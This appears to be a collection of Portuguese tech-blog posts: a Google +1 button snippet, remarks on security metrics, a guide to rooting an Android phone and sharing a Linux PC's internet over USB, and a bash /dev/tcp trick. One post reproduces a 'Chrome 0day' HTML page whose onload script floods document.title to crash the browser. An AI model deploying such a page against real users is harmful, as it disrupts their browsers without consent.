Caros,

Estão vendo o +1 no título dos posts ?

<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
  {lang: 'pt-BR'}
</script>

<!-- Place this tag where you want the +1 button to render -->
<g:plusone></g:plusone>

Enjoy

sds
Kl0nEz

Caros,

Estive ouvindo o podcast Para sua Segurança #7 e logo no início, por tratarem de "indicadores de segurança", há a citação de algumas premissas para o sucesso.

Tomei a liberdade de dar uma "kibada" e fiz algumas mudanças para que estas premissas possam resumir o que eu acredito;

"Não há sucesso em que não se gerencia;
Não se gerencia o que não se mede;
Não se mede o que não se define;
Não se define o que não se entende;
Não se entende o que não se conhece."

O resumo é "sucesso = conhecimento", quando *pensarem* em futucar na área de segurança, lembrem-se disso.

Conhecimento é a "alma" do negócio e nada de ficar gerando papel, relatório, e bla bla bla.

é isso,

sds
Kl0nEz

Caros,

Depois de muita espera, chegou meu novo telefone. Depois de muito tempo usando o Motorola A1200, o sujeito já estava tão ruim que digitar os números 1,4,5,7 e 8 era impossível, resolvi comprar um novo telefone.

Escolhi um aparelho com Android 2.2, lá da DX, o modelo é o H3000, chegou, e com a sorte que eu tenho, acabei precisando pagar a quantia equivalente à outro aparelho, em impostos, isso mesmo, o aparelho foi taxado em mais de 100% do valor original pois a receita estimou o valor do aparelho como 300USD e não os 138USD que estão na DX.

Pois bem, o desafio é fazer o telefone acessar a internet pela conexão USB, para ser mais veloz que os 1mb que consegui por wifi, e não gastar com o tráfego GPRS (sim, ele não tem 3g).

[cellphone] --> [usb] ---> [computer] ---> (internet)

Blz ?

Para isso eu usei:

(Phase 1 - rooting your phone)
Cellphone

Z4root - http://www.dealextreme.com/p/h3000-3-5- ... -gps-55985
SSHDroid - https://market.android.com/details?id=berserker.android.apps.sshdroid

1 - Instalar o Z4root e selecionar o root permanente.
2 - Boot
3 - Conectar o cabo USB no PC e selecionar "vinculo"
4 - Instalar o SSHDroid e executá-lo. O "android root" vai pedir permissão para executa-lo como "root" voce permite. Depois vá em:

Configurações -> Options -> Require Wifi = Off
Configurações -> Quit

5 - Abrir novamente o SSHDroid e deve aparecer:

Address: sftp://root@192.168.42.129:22
Status: ready

Agora no Desktop

6 - Basta conectar

$ ssh root@192.168.42.129
The authenticity of host '192.168.42.129 (192.168.42.129)' can't be established.
RSA key fingerprint is ea:d3:79:d2:73:a5:91:13:99:c3:27:7a:84:10:03:0a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.129' (RSA) to the list of known hosts.
SSHDroid
Use 'root' on rooted devices otherwise any username works
Default password is 'admin'root@192.168.42.129's password: 
# 

Agora você possui root no seu telefone, e acesso por SSH.... ;)

(Phase 2 - Network settings)

7 - No PC verificar a interface que foi criada e o IP.

$ ifconfig usb0
usb0      Link encap:Ethernet  Endereço de HW 42:c6:c4:06:ca:bf  
          inet end.: 192.168.42.37  Bcast:192.168.42.255  Masc:255.255.255.0
          endereço inet6: fe80::40c6:c4ff:fe06:cabf/64 Escopo:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Métrica:1
          pacotes RX:1303 erros:1 descartados:0 excesso:0 quadro:1
          Pacotes TX:1503 erros:0 descartados:0 excesso:0 portadora:0
          colisões:0 txqueuelen:1000 
          RX bytes:151684 (151.6 KB) TX bytes:440152 (440.1 KB)

Nos testes, este IP muda à cada boot do telefone

8 - Construindo o repasse de pacotes pelo Desktop, bem como uma regra de NAT.

$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
$ sudo iptables -t nat -I POSTROUTING -s 192.168.42.0/24 -j MASQUERADE

9 - Conectando-se ao telefone (conforme a "phase 1") e criando as rotas;

$ ssh root@192.168.42.129
SSHDroid
Use 'root' on rooted devices otherwise any username works
Default password is 'admin'root@192.168.42.129's password: 
# busybox route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.42.0    0.0.0.0         255.255.255.0   U     0      0        0 usb0
# 

10 - Adicionando o seu Desktop como rota default do celular, observar que o IP *DEVE* ser o mesmo que o da interface "usb0" do seu Desktop.

# busybox route add default gw 192.168.42.37 

Depois da rota adicionada, vamos verificar;

# busybox route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.42.0    0.0.0.0         255.255.255.0   U     0      0        0 usb0
0.0.0.0         192.168.42.37   0.0.0.0         UG    0      0        0 usb0
# 

E para (re)definir o servidor de DNS correto

#setprop net.dns1 8.8.8.8

Usei como teste o servidor de DNS do google, mas pode ser qualquer outro.

11 - Testando a conexão

# ping -c 1 www.google.com
PING www.l.google.com (74.125.234.113) 56(84) bytes of data.
64 bytes from 74.125.234.113: icmp_seq=1 ttl=46 time=22.8 ms

--- www.l.google.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 22.829/22.829/22.829/0.000 ms
# 

BINGOOOO !!!!!

Agora está funcionando, o celular acessa a internet usando a conexão do computador.

observações:

1 - Como eu uso o Linux, a parte que envolve o Desktop está levando em consideração o Linux.
2 - No macOS X *creio* que deva funcionar com o Internet Sharing habilitado, vou testar e depois aviso.
3 - No windows, imagino que também deva funcionar com aquele esquema do ICS (internet connection sharing), mas esse aí eu não tenho nem como testar, pois não tenho nenhuma estação windows, caso alguém siga o mesmo conceito que eu utilizei e queira que eu faça a referencia, me avise.

É isso...

sds
Kl0nEz

<HTML>
<HEAD>
<TITLE> Google Chrome 0day BOF/DOS Exploit </TITLE>
</HEAD>
<SCRIPT type="text/javascript">

<!-- The value of overflow vector "x" can also be x < 10000 and still cause the buffer overflow-->

function overflow()
{ var poc1 = "";
for (var x = 0;x < 20000; x++)
{
poc1 += "A";
}
var poc2 = poc1; <!-- poc2 = poc is the actual buffer which causes overflow -->
for (x = 0; x < 20000; x++) {
poc2 += poc1;
}
document.title = poc2;
}

</SCRIPT>
</TITLE>
<BODY BACKGROUND="http://k.min.us/jkMT5i.jpg" onload="javascript:overflow();" >
</BODY>
</HTML>

Caros,

Hoje fiquei conhecendo esta facilidade (?) da bash, e confesso que fiquei muito feliz por saber.

$ exec 3<>/dev/tcp/www.google.com.br/80
$ echo -e "GET / HTTP/1.1\n\n" >&3
$ cat <&3

E também, não se esqueça de fechar o handle.

$ exec <&3-

tks Tarzan pelo review.

A fonte foi um pdf com uns slides do blog www.mentebinaria.com.br .

http://www.mentebinaria.com.br/files/sl ... fsldc2.pdf

tks ao grlabs por ter me mostrado.

sds
Kl0nEz